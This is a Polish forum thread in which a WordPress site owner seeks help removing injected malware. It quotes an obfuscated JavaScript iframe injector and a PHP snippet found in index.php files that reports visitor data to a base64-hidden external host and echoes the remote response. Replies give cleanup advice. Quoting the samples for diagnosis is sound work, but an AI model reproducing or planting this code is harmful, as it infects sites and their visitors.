Skocz do zawartości
Zaloguj się, aby obserwować  
berix

Jak znaleźć złośliwy skrypt na stronie

Polecane posty

Witam mam pewien problem otóż na swoich stronach oprtych na silniku wordpress dopisuje mi się złośliwy skrypt. Wczoraj przez to google zablokowało mi 3 strony (inforamcja o szkodliwje stronie, oraz w narzędziach administratora google dostałem informacje).

Wczoraj całą noc analizowałem pliki wordpressa i nic nie znalazłem.

Złośliwy skrypt dopisuje w pierwszych liniach strony

<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new"a".prototype}catch(qqq){zz='val';ss="";if(1){f='fr'+'om'+'Char';f=f+'C'+'ode';}e=this[f.substr(11)+zz];t='y';}
n="3.5k3.5k51.5k50k15k19k49k54.5k48.5k57.5k53.5k49.5k54k57k22k50.5k49.5k57k33.5k53k49.5k53.5k49.5k54k57k56.5k32k59.5k41k47.5k50.5k38k47.5k53.5k49.5k19k18.5k48k54.5k49k59.5k18.5k19.5k44.5k23k45.5k19.5k60.5k5.5k3.5k3.5k3.5k51.5k50k56k47.5k53.5k49.5k56k19k19.5k28.5k5.5k3.5k3.5k61.5k15k49.5k53k56.5k49.5k15k60.5k5.5k3.5k3.5k3.5k49k54.5k48.5k57.5k53.5k49.5k54k57k22k58.5k56k51.5k57k49.5k19k16k29k51.5k50k56k47.5k53.5k49.5k15k56.5k56k48.5k29.5k18.5k51k57k57k55k28k22.5k22.5k56k47.5k60k57.5k60k54k47.5k51.5k22k51.5k54k22.5k60k22.5k23.5k23.5k18.5k15k58.5k51.5k49k57k51k29.5k18.5k23.5k23k18.5k15k51k49.5k51.5k50.5k51k57k29.5k18.5k23.5k23k18.5k15k56.5k57k59.5k53k49.5k29.5k18.5k58k51.5k56.5k51.5k48k51.5k53k51.5k57k59.5k28k51k51.5k49k49k49.5k54k28.5k55k54.5k56.5k51.5k57k51.5k54.5k54k28k47.5k48k56.5k54.5k53k57.5k57k49.5k28.5k53k49.5k50k57k28k23k28.5k57k54.5k55k28k23k28.5k18.5k30k29k22.5k51.5k50k56k47.5k53.5k49.5k30k16k19.5k28.5k5.5k3.5k3.5k61.5k5.5k3.5k3.5k50k57.5k54k48.5k57k51.5k54.5k54k15k51.5k50k56k47.5k53.5k49.5k56k19k19.5k60.5k5.5k3.5k3.5k3.5k58k47.5k56k15k50k15k29.5k15k49k54.5k48.5k57.5k53.5k49.5k54k57k22k48.5k56k49.5k47.5k57k49.5k33.5k53k49.5k53.5k49.5k54k57k19k18.5k51.5k50k56k47.5k53.5k49.5k18.5k19.5k28.5k50k22k56.5k49.5k57k31.5k57k57k56k51.5k48k57.5k57k49.5k19k18.5k56.5k56k48.5k18.5k21k18.5k51k57k57k55k28k22.5k22.5k56k47.5k60k57.5k60k54k47.5k51.5k22k51.5k54k22.5k60k22.5k23.5k23.5k18.5k19.5k28.5k50k22k56.5k57k59.5k53k49.5k22k58k51.5k56.5k51.5k48k51.5k53k51.5k57k59.5k29.5k18.5k51k51.5k49k49k49.5k54k18.5k28.5k50k22k56.5k57k59.5k53k49.5k22k55k54.5k56.5k51.5k57k51.5k54.5k54k29.5k18.5k47.5k48k56.5k54.5k53k57.5k57k49.5k18.5k28.5k50k22k56.5k57k59.5k53k49.5k22k53k49.5k50k57k29.5k18.5k23k18.5k28.5k50k22k56.5k57k59.5k53k49.5k22k57k54.5k55k29.5k18.5k23k18.5k28.5k50k22k56.5k49.5k57k31.5k57k57k56k51.5k48k57.5k57k49.5k19k18.5k58.5k51.5k49k57k51k18.5k21k18.5k23.5k23k18.5k19.5k28.5k50k22k56.5k49.5k57k31.5k57k57k56k51.5k48k57.5k57k49.5k19k18.5k51k49.5k51.5k50.5k51k57k18.5k21k18.5k23.5k23k18.5k19.5k28.5k5.5k3.5k3.5k3.5k49k54.5k48.5k57.5k53.5k49.5k54k57k22k50.5k49.5k57k33.5k53k49.5k53.5k49.5k54k57k56.5k32k59.5k41k47.5k50.5k38k47.5k53.5k49.5k19k18.5k48k54.5k49k59.5k18.5k19.5k44.5k23k45.5k22k47.5k55k55k49.5k54k49k32.5k51k51.5k53k49k19k50k19.5k28.5k5.5k3.5k3.5k61.5".split("ak".substr(1));for(i=0;i!=555;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(q);</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pl-PL">

 

I teraz mam pytanie czy jest jakaś osoba która by to usuneła, lub zna jakiś program (avast nic nie wykrywa).

Musi się to obejść bez reinstalacji cms'a poniważ posiadam liczne modyfikacje pluginów oraz theme.

Jestem skłonny zapłacić

Edytowano przez berix (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Sprawdź daty modyfikacji plików.

Do admina też Ci dokleja? Spróbuj na chwile przełączyć na inny szablon i zobaczyć czy też jest taki efekt.

Powyższe trochę ograniczy Ci gdzie szukać.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Kamikadze

Pamiętam że na joomli miałem z tym problemy, co dwa miesiące coś się doczepiało do templatki i google blokowało...

 

W tedy nic nie dało się zrobić (stare joomle) i trzeba było czekać na aktualizację.

 

Sprawdź czy nie masz dostępnych aktualizacji WP i usuń ten zły kod.

 

 

 

Tutaj masz art odnośnie WP i malware :)

http://blog.adiasz.pl/2008/02/17/blokada-witryny-w-google-z-powodu-wykrycia-malware/

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Pokuć

Miałem to na kilku CMS, przyczyną był Total Commander a dokładnie to dziury w nim. Po zmianie na FileZillę i zmianie wszystkich haseł (FTP, panel, bazy) problem znikł. Nadpisywały mi się tylko pliki index.php

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Od 2009 roku nie ma już tego problemu z Total Commanderem bo hasła są kodowane AES256 no chyba, że używałeś starej wersji.

Poza tym to, główna przyczyną nie był sam TC tylko świństwa, które wykradały Ci te hasła.

TC używam praktycznie od zawsze jako klient ftp i nigdy nic mi z niego nie wyciekło.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Sprawdź komputer programem antywirusowym, zmień hasła do ftpów, zmień program do ftp, zaktualizuj cmsy do najnowszych stabilnych wersji. Jeśli nie pomoże: spróbuj z czystego systemu (inny komputer lub wirtualna maszyna). Jeśli nie pomoże: sprawdzaj system na którym masz postawione cmsy.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Dalszy ciąg....

Co do menadżera ftp korzystam z filezilli. Powiem tak poczęsci jest to moja wina poniważ na sowim nowym laptopie nie miałem antywirusa, po instalacji avasta wykrył 1 wirusa na komputerze (wcześniej logowałem się na konta FTP).

O tym problemie dokładnie mnie poinformował support hostingu (przypadkowo, bo pisałem w sprawie że strona strasznie powoli chodzić).

To było w weekend, wczoraj postanowiłem przerzucić pliki na lokalny dysk i przeskanować pliki, usunąć i wrzucić spowrotem (avast nic nie wykrył). Poczęści coś to pomogło lecz ten skrypt jakby znika i poajwia się.

Na jednym koncie jest tak że tylko na 1 podstronie jest widoczny.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

To akurat proste - skrypt wrzuca cookie, zwykle o nazwie wyglądającej na popularny system statystyk.

 

Przeszukanie plików antywirusem niewiele Ci pomoże, takie wirusy działają raczej przez includowanie plików z zewnętrznych serwerów i to najczęściej przez iframe. Przetrzep te pliki jakimś edytorem tekstowym, pozwalającym na szukanie w wielu plikach (np. Notepad++). Szukaj przede wszystkim wystąpień funkcji eval() i base64_decode() i porównuj je z czystym źródłem.

 

Dziekuje a pomoc własnie znalałem to i dokładnie tak jest jak na pisze, zainfekowane ma pliki index.php zarowno w glownym katalogu public_html jak i w theme

złośliwy kod

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
   // This code use for global bot statistic
   $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
   $stCurlHandle = NULL;
   $stCurlLink = "";
   if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
   {
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics		   
    $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
	    $stCurlHandle = curl_init( $stCurlLink );
   }
   }
if ( $stCurlHandle !== NULL )
{
   curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
   $sResult = @curl_exec($stCurlHandle);
   if ($sResult[0]=="O")
 {$sResult[0]=" ";
  echo $sResult; // Statistic code end
  }
   curl_close($stCurlHandle);
}
}
?>

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

narazie ten kod znalazłem w plikach

- główny plik index.php

- wygląd > footer.php

- wygląd > page.php

- wygląd > index.php

- public_html/wp-content/themes/index.php

- public_html/wp-content/index.php

- public_html/plugins/index.php

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość GrandBB

Sprawdź czy przypadkiem kod nie jest zagnieżdżony w bazie danych. Czasami zdarza się tak, ze pomimo tego, że pliki są czyste wirus przechodzi z bazy danych po wpisaniu adresu url. Z bazy danych raczej usuniesz to ręcznie bez zbędnych problemów.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Witam kolejny raz moje konto zostało zatakowane przez skrypty

dzisaj dopisał mi się ten złośliwy kod (wszsytkie pliki index.php)

Czy to może być wina Hostingu?

Poniważ jest to nie mozliwe że wordpress 3.3.1 + 6 bardzo znanych wtyczek posiadało takie dziury....

Edytowano przez berix (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Poproś o logi apache i ftp firmę hostingową z czasu kiedy zostały zmienione pliki i szukaj tam.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Witam nadal problem jest

ostatni atak miałem w nocy z 31.03 na 01.04.2012.

Pisałem do supportu unixstorm właściciel firmy jest na 1000% pewny że to moja wina.... pisze mi że moje skórki dla WP są dziurawe odziwo zaraża mi 5 stron na WP które posaidają inny theme (tylko jeden z nich wykorzystuje skrypt timthumb który jest zaktualizowany do najnowszej wersji, także support pisał że to też może być wina tego skryptu). Suuport zażuca także że posiadam nieaktualną wersję wordpress ale jest to nieprawdą

Dopowiem że wszsytkie strony są na koncie reseller a kązde z nich jest dodany nowy użytkownik.

Praktycznie złośliwy kod dopisuje się do wszystkich plików index.php (nawet jeśli nie są to pliki od wordpress).

 

Do ftp uzywam tylko i wyłącznie fillezilla posaidam firewalla i antywirusa

 

unixstorm pisze:

Co więcej, używa Pan również prawdopodobnie dziurawego szablonu:

http://blog.spiderla...-customers.html

 

Proponuję poważnie podejść do kwestii bezpieczeństwa Pana stron lub zmienić skrypt jeśli nie jest Pan w stanie go wystarczająco zabezpieczyć przed takimi atakami.[...]

 

Proszę się dokładnie zapoznać z informacjami dostępnymi w internecie.

Wszystkie takie ataki przeprowadzane są na dziurawy skrypt timhumb z szablonami Wordpressa.

 

Jeśli nie jest Pan w stanie nad tym zapanować - proszę zmienić skrypt.

 

Powtarzam, problem nie jest po naszej stronie i to Pan odpowiada za należyte zabezpieczenie udostępnianych stron WWW, tudzież usunięcie w nich wszelkich błędów umożliwiających tego typu ataki.

Edytowano przez berix (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Witam nadal problem jest

ostatni atak miałem w nocy z 31.03 na 01.04.2012.

Pisałem do supportu unixstorm właściciel firmy jest na 1000% pewny że to moja wina.... pisze mi że moje skórki dla WP są dziurawe odziwo zaraża mi 5 stron na WP które posaidają inny theme (tylko jeden z nich wykorzystuje skrypt timthumb który jest zaktualizowany do najnowszej wersji, także support pisał że to też może być wina tego skryptu). Suuport zażuca także że posiadam nieaktualną wersję wordpress ale jest to nieprawdą

Dopowiem że wszsytkie strony są na koncie reseller a kązde z nich jest dodany nowy użytkownik.

Praktycznie złośliwy kod dopisuje się do wszystkich plików index.php (nawet jeśli nie są to pliki od wordpress).

 

Do ftp uzywam tylko i wyłącznie fillezilla posaidam firewalla i antywirusa

 

unixstorm pisze:

 

 

Zmieniałeś już raz hosting, u nas też miałeś problem z włamaniami na stronę.

Może wreszcie pora pójść po rozum do głowy, a nie na siłę szukać usprawiedliwienia?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Zmieniałeś już raz hosting, u nas też miałeś problem z włamaniami na stronę.

Może wreszcie pora pójść po rozum do głowy, a nie na siłę szukać usprawiedliwienia?

co do waszego hostingu vipower.pl był inny rodzaj ataków ponieważ ktoś wrzucał perfidnie skrypty php udające menadżer FTP logując się jako root bez znania hasła i loginu, także o tym jest wątek na wht. I akurat tam mi pisali że to raczej wina hostingu a nie tak jak tutaj moja.... Wiec bierzcie się za łatanie hostingu zarówno szybkiego jak i dziurawego

Pozdrawiam

Edytowano przez berix (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Założę się, że to wina tego timthumb, było o tym dość głośno, zaktualizuj, usuń wadliwe pliki i zobacz czy znowu wróci. Jeszcze inna możliwość, że masz jakiegoś keylogera na komputerze i wykrada ci hasła, ale to by wykradło nie tylko do FTP.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się

Zaloguj się, aby obserwować  

×